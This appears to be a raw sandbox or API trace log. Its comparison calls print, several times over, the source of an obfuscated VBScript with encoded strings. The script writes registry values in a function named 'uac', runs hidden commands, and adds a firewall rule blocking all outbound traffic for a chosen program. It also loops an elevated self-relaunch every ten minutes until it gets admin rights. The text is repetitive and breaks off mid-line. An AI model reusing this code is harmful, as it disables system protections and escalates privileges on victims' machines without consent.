bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0226.345] wcsncmp (_String1="nStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.346] wcsncmp (_String1="Str(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0226.346] wcsncmp (_String1="tr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.346] wcsncmp (_String1="r(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.346] wcsncmp (_String1="(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 